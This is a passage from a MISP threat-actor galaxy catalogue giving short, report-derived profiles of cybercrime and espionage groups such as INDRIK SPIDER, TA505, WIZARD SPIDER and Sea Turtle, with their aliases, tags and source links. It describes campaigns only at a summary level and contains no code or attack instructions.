HookAds is a malvertising campaign that purchases cheap ad space on low-quality ad networks commonly used by adult web sites, online games, or blackhat SEO sites. These ads include JavaScript that redirects a visitor through a series of decoy sites that look like pages filled with native advertisements, online games, or other low-quality pages. Under the right circumstances, a visitor will silently load the Fallout exploit kit, which tries to install its malware payload.

The tag is: misp-galaxy:threat-actor="HookAds"

Table 11944. Table References

Links

https://www.bleepingcomputer.com/news/security/hookads-malvertising-installing-malware-via-the-fallout-exploit-kit/

INDRIK SPIDER

INDRIK SPIDER is a sophisticated eCrime group that has been operating Dridex since June 2014. In 2015 and 2016, Dridex was one of the most prolific eCrime banking trojans on the market and, since 2014, those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits. Throughout its years of operation, Dridex has received multiple updates with new modules developed and new anti-analysis features added to the malware. In August 2017, a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K.’s National Health Service (NHS), with a high ransom demand of 53 BTC (approximately $200,000 USD). The targeting of an organization rather than individuals, and the high ransom demands, made BitPaymer stand out from other contemporary ransomware at the time. Though the encryption and ransom functionality of BitPaymer was not technically sophisticated, the malware contained multiple anti-analysis features that overlapped with Dridex. Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER, suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy.

The tag is: misp-galaxy:threat-actor="INDRIK SPIDER"

INDRIK SPIDER has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Manatee Tempest" with estimative-language:likelihood-probability="likely"

Table 11945. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

DNSpionage

Cisco Talos recently discovered a new campaign targeting Lebanon and the United Arab Emirates (UAE) affecting .gov domains, as well as a private Lebanese airline company. Based on our research, it’s clear that this adversary spent time understanding the victims' network infrastructure in order to remain under the radar and act as inconspicuous as possible during their attacks. Based on this actor’s infrastructure and TTPs, we haven’t been able to connect them with any other campaign or actor that’s been observed recently. This particular campaign utilizes two fake, malicious websites containing job postings that are used to compromise targets via malicious Microsoft Office documents with embedded macros. The malware utilized by this actor, which we are calling "DNSpionage," supports HTTP and DNS communication with the attackers. In a separate campaign, the attackers used the same IP to redirect the DNS of legitimate .gov and private company domains. During each DNS compromise, the actor carefully generated Let’s Encrypt certificates for the redirected domains. These certificates provide X.509 certificates for TLS free of charge to the user. We don’t know at this time if the DNS redirections were successful. In this post, we will break down the attackers' methods and show how they used malicious documents to attempt to trick users into opening malicious websites that are disguised as "help wanted" sites for job seekers. Additionally, we will describe the malicious DNS redirection and the timeline of the events.

The tag is: misp-galaxy:threat-actor="DNSpionage"

DNSpionage is also known as:

  • COBALT EDGEWATER

Table 11946. Table References

Links

https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html

https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html

https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html

https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/

https://krebsonsecurity.com/tag/dnspionage/

https://www.secureworks.com/research/threat-profiles/cobalt-edgewater

DarkVishnya

Dubbed DarkVishnya, the attacks targeted at least eight banks using readily available gear such as netbooks or inexpensive laptops, Raspberry Pi mini-computers, or a Bash Bunny, a USB-sized piece of hardware for penetration testing purposes that can pose as a keyboard, flash storage, network adapter, or any serial device.

The tag is: misp-galaxy:threat-actor="DarkVishnya"

Table 11947. Table References

Links

https://www.bleepingcomputer.com/news/security/netbooks-rpis-and-bash-bunny-gear-attacking-banks-from-the-inside/

Operation Poison Needles

What’s noteworthy is that according to the introduction on the compromised website of the polyclinic (http://www.p2f.ru), the institution was established in 1965 and was founded by the Presidential Administration of Russia. The multidisciplinary outpatient institution mainly serves the civil servants of the highest executive, legislative and judicial authorities of the Russian Federation, as well as famous figures of science and art. Since it is the first detection of this APT attack by 360 Security on a global scale, we code-named it “Operation Poison Needles”, considering that the target was a medical institution. Currently, the attribution of the attacker is still under investigation. However, the special background of the polyclinic and the sensitiveness of the group it served both indicate the attack is highly targeted. Simultaneously, the attack occurred at a very sensitive timing of the Kerch Strait Incident, so it also aroused the assumption on the political attribution of the attack.

The tag is: misp-galaxy:threat-actor="Operation Poison Needles"

Table 11948. Table References

Links

http://blogs.360.cn/post/PoisonNeedles_CVE-2018-15982_EN

GC01

From November 2017 to October 2018, we attributed 14 campaigns to the GC threat actors that used a specific MaaS provider (hereinafter “the Provider”) offered by a known individual (hereinafter “the Provider Operator”).

The tag is: misp-galaxy:threat-actor="GC01"

GC01 is also known as:

  • Golden Chickens

  • Golden Chickens01

  • Golden Chickens 01

GC01 has relationships with:

  • similar: misp-galaxy:threat-actor="GC02" with estimative-language:likelihood-probability="likely"

Table 11949. Table References

Links

https://medium.com/@quoscient/golden-chickens-uncovering-a-malware-as-a-service-maas-provider-and-two-new-threat-actors-using-61cf0cb87648

GC02

From November 2017 to October 2018, we attributed 14 campaigns to the GC threat actors that used a specific MaaS provider (hereinafter “the Provider”) offered by a known individual (hereinafter “the Provider Operator”).

The tag is: misp-galaxy:threat-actor="GC02"

GC02 is also known as:

  • Golden Chickens

  • Golden Chickens02

  • Golden Chickens 02

GC02 has relationships with:

  • similar: misp-galaxy:threat-actor="GC01" with estimative-language:likelihood-probability="likely"

Table 11950. Table References

Links

https://medium.com/@quoscient/golden-chickens-uncovering-a-malware-as-a-service-maas-provider-and-two-new-threat-actors-using-61cf0cb87648

Operation Sharpshooter

The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries. Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.

The tag is: misp-galaxy:threat-actor="Operation Sharpshooter"

Operation Sharpshooter has relationships with:

  • similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"

Table 11951. Table References

Links

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/

https://www.bleepingcomputer.com/news/security/op-sharpshooter-connected-to-north-koreas-lazarus-group/

TA505

TA505, the name given by Proofpoint, has been in the cybercrime business for at least four years. This is the group behind the infamous Dridex banking trojan and Locky ransomware, delivered through malicious email campaigns via Necurs botnet. Other malware associated with TA505 include Philadelphia and GlobeImposter ransomware families.

The tag is: misp-galaxy:threat-actor="TA505"

TA505 is also known as:

  • SectorJ04

  • SectorJ04 Group

  • GRACEFUL SPIDER

  • GOLD TAHOE

  • Dudear

  • G0092

  • ATK103

  • Hive0065

  • CHIMBORAZO

  • Spandex Tempest

TA505 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Lace Tempest" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Spandex Tempest" with estimative-language:likelihood-probability="likely"

Table 11952. Table References

Links

https://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/

https://www.proofpoint.com/sites/default/files/ta505_timeline_final4_0.png

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter

https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware

https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf

https://threatpost.com/ta505-servhelper-malware/140792/

https://blog.yoroi.company/research/the-stealthy-email-stealer-in-the-ta505-arsenal/

https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104

https://www.secureworks.com/research/threat-profiles/gold-tahoe

https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546

https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/

https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic

https://cyberthreat.thalesgroup.com/attackers/ATK103

https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/

https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain

GRIM SPIDER

GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell. The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past. Similar to Samas and BitPaymer, Ryuk is specifically used to target enterprise environments. Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release. Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors. However, Ryuk is only used by GRIM SPIDER and, unlike Hermes, Ryuk has only been used to target enterprise environments. Since Ryuk’s appearance in August, the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD. Grim Spider is reportedly associated with Lunar Spider and Wizard Spider.

The tag is: misp-galaxy:threat-actor="GRIM SPIDER"

GRIM SPIDER is also known as:

  • GOLD ULRICK

Table 11953. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

WIZARD SPIDER

Wizard Spider is reportedly associated with Grim Spider and Lunar Spider. The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware. This group represents a growing criminal enterprise of which GRIM SPIDER appears to be a subset. The LUNAR SPIDER threat group is the Eastern European-based operator and developer of the commodity banking malware called BokBot (aka IcedID), which was first observed in April 2017. The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud, through the use of webinjects and a malware distribution function. GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell. The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past.

The tag is: misp-galaxy:threat-actor="WIZARD SPIDER"

WIZARD SPIDER is also known as:

  • TEMP.MixMaster

  • GOLD BLACKBURN

  • FIN12

  • Periwinkle Tempest

  • DEV-0193

  • Storm-0193

  • Trickbot LLC

  • UNC2053

  • Pistachio Tempest

  • DEV-0237

WIZARD SPIDER has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Periwinkle Tempest" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Pistachio Tempest" with estimative-language:likelihood-probability="likely"

Table 11954. Table References

Links

https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/

https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/

https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/

https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

https://www.secureworks.com/research/threat-profiles/gold-ulrick

https://www.secureworks.com/research/dyre-banking-trojan

https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic

https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users

http://www.secureworks.com/research/threat-profiles/gold-blackburn

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf

https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/

https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

MUMMY SPIDER

MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo. First observed in mid-2014, this malware shared code with the Bugat (aka Feodo) banking Trojan. However, MUMMY SPIDER swiftly developed the malware’s capabilities to include an RSA key exchange for command and control (C2) communication and a modular architecture. MUMMY SPIDER does not follow typical criminal behavioral patterns. In particular, MUMMY SPIDER usually conducts attacks for a few months before ceasing operations for a period of between three and 12 months, before returning with a new variant or version. After a 10 month hiatus, MUMMY SPIDER returned Emotet to operation in December 2016 but the latest variant is not deploying a banking Trojan module with web injects, it is currently acting as a ‘loader’ delivering other malware packages. The primary modules perform reconnaissance on victim machines, drop freeware tools for credential collection from web browsers and mail clients and a spam plugin for self-propagation. The malware is also issuing commands to download and execute other malware families such as the banking Trojans Dridex and Qakbot. MUMMY SPIDER advertised Emotet on underground forums until 2015, at which time it became private. Therefore, it is highly likely that Emotet is operate

The tag is: misp-galaxy:threat-actor="MUMMY SPIDER"

MUMMY SPIDER is also known as:

  • TA542

  • GOLD CRESTWOOD

Table 11955. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service

https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return

https://www.secureworks.com/research/threat-profiles/gold-crestwood

STARDUST CHOLLIMA

Open-source reporting has claimed that the Hermes ransomware was developed by the North Korean group STARDUST CHOLLIMA (activities of which have been publicly reported as part of the “Lazarus Group”), because Hermes was executed on a host during the SWIFT compromise of FEIB in October 2017.

The tag is: misp-galaxy:threat-actor="STARDUST CHOLLIMA"

Table 11956. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

Cold River

In short, “Cold River” is a sophisticated threat (actor) that utilizes DNS subdomain hijacking, certificate spoofing, and covert tunneled command and control traffic in combination with complex and convincing lure documents and custom implants.

The tag is: misp-galaxy:threat-actor="Cold River"

Cold River is also known as:

  • Nahr Elbard

  • Nahr el bared

Table 11957. Table References

Links

https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/

Silence group

Silence is a relatively new threat actor that has been operating since mid-2016. Group-IB has exposed the attacks committed by the Silence cybercriminal group. While the gang had previously targeted Russian banks, Group-IB experts have also discovered evidence of the group’s activity in more than 25 countries worldwide. Group-IB has published its first detailed report on the tactics and tools employed by Silence. Group-IB security analysts' hypothesis is that at least one of the gang members appears to be a former or current employee of a cyber security company. The confirmed damage from Silence activity is estimated at 800 000 USD. Silence is a group of Russian-speaking hackers, based on the language of their commands, the location of the infrastructure they used, and the geography of their targets (Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan), although phishing emails were also sent to bank employees in Central and Western Europe, Africa, and Asia. Furthermore, Silence used Russian words typed on an English keyboard layout for the commands of the employed backdoor. The hackers also used Russian-language web hosting services.

The tag is: misp-galaxy:threat-actor="Silence group"

Silence group is also known as:

  • Silence

  • WHISPER SPIDER

Table 11958. Table References

Links

https://reaqta.com/2019/01/silence-group-targeting-russian-banks/

https://www.group-ib.com/blog/silence

https://securelist.com/the-silence/83009/

APT39

APT39 was created to bring together previous activities and methods used by this actor, and its activities largely align with a group publicly referred to as "Chafer." However, there are differences in what has been publicly reported due to the variances in how organizations track activity. APT39 primarily leverages the SEAWEED and CACHEMONEY backdoors along with a specific variant of the POWBAT backdoor. While APT39’s targeting scope is global, its activities are concentrated in the Middle East. APT39 has prioritized the telecommunications sector, with additional targeting of the travel industry and IT firms that support it and the high-tech industry.

The tag is: misp-galaxy:threat-actor="APT39"

APT39 is also known as:

  • Chafer

  • REMIX KITTEN

  • COBALT HICKMAN

  • G0087

  • Radio Serpens

  • TA454

Table 11959. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html

https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions

https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/

https://securelist.com/chafer-used-remexi-malware/89538/

https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

https://attack.mitre.org/groups/G0087/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.secureworks.com/research/threat-profiles/cobalt-hickman

https://unit42.paloaltonetworks.com/atoms/radioserpens/

Siesta

FireEye recently looked deeper into the activity discussed in TrendMicro’s blog and dubbed the “Siesta” campaign. The tools, modus operandi, and infrastructure used in the campaign present two possibilities: either the Chinese cyber-espionage unit APT1 is perpetrating this activity, or another group is using the same tactics and tools as the legacy APT1. The Siesta campaign reinforces the fact that analysts and network defenders should remain on the lookout for known, public indicators and for shared attributes that allow security experts to detect multiple actors with one signature.

The tag is: misp-galaxy:threat-actor="Siesta"

Table 11960. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/03/a-detailed-examination-of-the-siesta-campaign.html

Gallmaker

Symantec researchers have uncovered a previously unknown attack group that is targeting government and military targets, including several overseas embassies of an Eastern European country, and military and defense targets in the Middle East. This group eschews custom malware and uses living off the land (LotL) tactics and publicly available hack tools to carry out activities that bear all the hallmarks of a cyber espionage campaign. The group, which we have given the name Gallmaker, has been operating since at least December 2017, with its most recent activity observed in June 2018.

The tag is: misp-galaxy:threat-actor="Gallmaker"

Table 11961. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group

BOSS SPIDER

Throughout 2018, CrowdStrike Intelligence tracked BOSS SPIDER as it regularly updated Samas ransomware and received payments to known Bitcoin (BTC) addresses. This consistent pace of activity came to an abrupt halt at the end of November 2018 when the U.S. DoJ released an indictment for Iran-based individuals Faramarz Shahi Savandi and Mohammad Mehdi Shah Mansouri, alleged members of the group.

The tag is: misp-galaxy:threat-actor="BOSS SPIDER"

BOSS SPIDER is also known as:

  • GOLD LOWELL

Table 11962. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

https://www.secureworks.com/research/threat-profiles/gold-lowell

https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit

https://www.secureworks.com/blog/samas-ransomware

https://www.secureworks.com/blog/ransomware-deployed-by-adversary

https://www.secureworks.com/research/samsam-ransomware-campaigns

PINCHY SPIDER

First observed in January 2018, GandCrab ransomware quickly began to proliferate and receive regular updates from its developer, PINCHY SPIDER, which over the course of the year established a RaaS operation with a dedicated set of affiliates. CrowdStrike Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments, using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams. This change in tactics makes PINCHY SPIDER and its affiliates the latest eCrime adversaries to join the growing trend of targeted, low-volume/high-return ransomware deployments known as “big game hunting.” PINCHY SPIDER is the criminal group behind the development of the ransomware most commonly known as GandCrab, which has been active since January 2018. PINCHY SPIDER sells access to use GandCrab ransomware under a partnership program with a limited number of accounts. The program is operated with a 60-40 split in profits (60 percent to the customer), as is common among eCrime actors, but PINCHY SPIDER is also willing to negotiate up to a 70-30 split for “sophisticated” customers.

The tag is: misp-galaxy:threat-actor="PINCHY SPIDER"

Table 11963. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

GURU SPIDER

Early in 2018, CrowdStrike Intelligence observed GURU SPIDER supporting the distribution of multiple crimeware families through its flagship malware loader, Quant Loader.

The tag is: misp-galaxy:threat-actor="GURU SPIDER"

Table 11964. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

SALTY SPIDER

Beginning in January 2018 and persisting through the first half of the year, CrowdStrike Intelligence observed SALTY SPIDER, developer and operator of the long-running Sality botnet, distribute malware designed to target cryptocurrency users.

The tag is: misp-galaxy:threat-actor="SALTY SPIDER"

Table 11965. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

NOMAD PANDA

In the first quarter of 2018, CrowdStrike Intelligence identified NOMAD PANDA activity targeting Central Asian nations with exploit documents built with the 8.t tool.

The tag is: misp-galaxy:threat-actor="NOMAD PANDA"

Table 11966. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

Flash Kitten

This suspected Iran-based adversary conducted long-running SWC campaigns from December 2016 until public disclosure in July 2018. Like other Iran-based actors, the target scope for FLASH KITTEN appears to be focused on the MENA region.

The tag is: misp-galaxy:threat-actor="Flash Kitten"

Table 11967. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

TINY SPIDER

According to CrowdStrike, this actor is using TinyLoader and TinyPOS, potentially buying access through Dridex infections.

The tag is: misp-galaxy:threat-actor="TINY SPIDER"

Table 11968. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

LUNAR SPIDER

According to CrowdStrike, this actor is using BokBot/IcedID, potentially buying distribution through Emotet infections. On March 17, 2019, CrowdStrike Intelligence observed the use of a new BokBot (developed and operated by LUNAR SPIDER) proxy module in conjunction with TrickBot (developed and operated by WIZARD SPIDER), which may provide WIZARD SPIDER with additional tools to steal sensitive information and conduct fraudulent wire transfers. This activity also provides further evidence to support the existence of a flourishing relationship between these two actors. Lunar Spider is reportedly associated with Grim Spider and Wizard Spider.

The tag is: misp-galaxy:threat-actor="LUNAR SPIDER"

LUNAR SPIDER is also known as:

  • GOLD SWATHMORE

Table 11969. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/

https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/

https://www.secureworks.com/research/threat-profiles/gold-swathmore

RATPAK SPIDER

In July 2018, the source code of Pegasus, RATPAK SPIDER’s malware framework, was anonymously leaked. This malware has been linked to the targeting of Russia’s financial sector. Associated malware, Buhtrap, which has been leaked previously, was observed this year in connection with SWC campaigns that also targeted Russian users.

The tag is: misp-galaxy:threat-actor="RATPAK SPIDER"

Table 11970. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

APT-C-36

Since April 2018, an APT group (Blind Eagle, APT-C-36) suspected of originating from South America has carried out continuous targeted attacks against Colombian government institutions as well as important corporations in the financial sector, the petroleum industry, professional manufacturing, etc.

The tag is: misp-galaxy:threat-actor="APT-C-36"

APT-C-36 is also known as:

  • Blind Eagle

Table 11972. Table References

Links

https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/

https://www.ecucert.gob.ec/wp-content/uploads/2022/03/alerta-APTs-2022-03-23.pdf

https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia

https://lab52.io/blog/apt-c-36-recent-activity-analysis/

https://www.trendmicro.com/en_ph/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/

https://attack.mitre.org/groups/G0099/

IRIDIUM

Resecurity’s research indicates that the attack on Parliament is a part of a multi-year cyberespionage campaign orchestrated by a nation-state actor whom we are calling IRIDIUM. This actor targets sensitive government, diplomatic, and military resources in the countries comprising the Five Eyes intelligence alliance (which includes Australia, Canada, New Zealand, the United Kingdom and the United States).

The tag is: misp-galaxy:threat-actor="IRIDIUM"

IRIDIUM has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Seashell Blizzard" with estimative-language:likelihood-probability="likely"

Table 11973. Table References

Links

https://www.nbcnews.com/politics/national-security/iranian-backed-hackers-stole-data-major-u-s-government-contractor-n980986

https://threatpost.com/ranian-apt-6tb-data-citrix/142688/

https://hub.packtpub.com/resecurity-reports-iriduim-behind-citrix-data-breach-200-government-agencies-oil-and-gas-companies-and-technology-companies-also-targeted/

SandCat

SandCat is a group that was discovered more recently by Kaspersky. One of the Windows vulnerabilities patched by Microsoft in December had been exploited by both FruityArmor and SandCat in attacks targeting the Middle East and Africa. SandCat has been using FinFisher/FinSpy spyware and CHAINSHOT, a piece of malware analyzed earlier this year by Palo Alto Networks. The group has also used the CVE-2018-8589 and CVE-2018-8611 Windows vulnerabilities in its attacks, both of which had zero-day status when Microsoft released fixes.

The tag is: misp-galaxy:threat-actor="SandCat"

Table 11974. Table References

Links

https://securelist.com/zero-day-in-windows-kernel-transaction-manager-cve-2018-8611/89253/

Operation Comando

Operation Comando is a pure cybercrime campaign, possibly of Brazilian origin, with a concrete and persistent focus on the hospitality sector, which proves how a threat actor can be successful in pursuing its objectives while maintaining a cheap budget. The use of DDNS services, publicly available remote access tools, and a minimum of software development knowledge (in this case VB.NET) has been enough to run a campaign lasting months and potentially gather credit card information and other data.

The tag is: misp-galaxy:threat-actor="Operation Comando"

Table 11975. Table References

Links

https://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/

APT-C-27

A threat actor which has been active since at least November 2014. This group launched long-term attacks against organizations in the Syrian region using Android and Windows malware. Its objective is the theft of sensitive information.

The tag is: misp-galaxy:threat-actor="APT-C-27"

APT-C-27 is also known as:

  • GoldMouse

  • Golden RAT

  • ATK80

Table 11976. Table References

Links

https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/

https://ti.360.net/blog/articles/analysis-of-apt-c-27/

https://web.archive.org/web/20180827024318/http://csecybsec.com/download/zlab/20180723_CSE_APT27_Syria_v1.pdf

Operation ShadowHammer

A newly discovered supply chain attack that leveraged ASUS Live Update software. The goal of the attack was to surgically target an unknown pool of users, who were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses in the trojanized samples, and this list was used to identify the actual intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack. Of course, there might be other samples out there with different MAC addresses in their list.

The tag is: misp-galaxy:threat-actor="Operation ShadowHammer"

Table 11977. Table References

Links

https://securelist.com/operation-shadowhammer/89992/

Whitefly

In July 2018, an attack on Singapore’s largest public health organization, SingHealth, resulted in a reported 1.5 million patient records being stolen. Until now, nothing was known about who was responsible for this attack. Symantec researchers have discovered that this attack group, which we call Whitefly, has been operating since at least 2017, has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information.

The tag is: misp-galaxy:threat-actor="Whitefly"

Table 11978. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/whitefly-espionage-singapore

https://www.reuters.com/article/us-singapore-cyberattack/cyberattack-on-singapore-health-database-steals-details-of-1-5-million-including-pm-idUSKBN1KA14J

Sea Turtle

This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have in the internet. That trust and the stability of the DNS system as a whole drives the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system.

The tag is: misp-galaxy:threat-actor="Sea Turtle"

Sea Turtle is also known as:

  • COSMIC WOLF

  • Marbled Dust

  • SILICON

  • Teal Kurma

  • UNC1326

Sea Turtle has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Marbled Dust" with estimative-language:likelihood-probability="likely"

Table 11979. Table References

Links

https://blog.talosintelligence.com/2019/04/seaturtle.html

https://blog.talosintelligence.com/sea-turtle-keeps-on-swimming

https://www.reuters.com/article/us-cyber-attack-hijack-exclusive/exclusive-hackers-acting-in-turkeys-interests-believed-to-be-behind-recent-cyberattacks-sources-idUSKBN1ZQ10X

https://icann.zoom.us/recording/play/AhQB4AQyjCuEJGz2wQQans0Xqkz3su8swGLQoORJhdECw9ttz0TbuyzBlue85gIY

https://community.icann.org/download/attachments/109483867/Cybersecurity%20and%20the%20ICANN%20Ecosystem.pdf

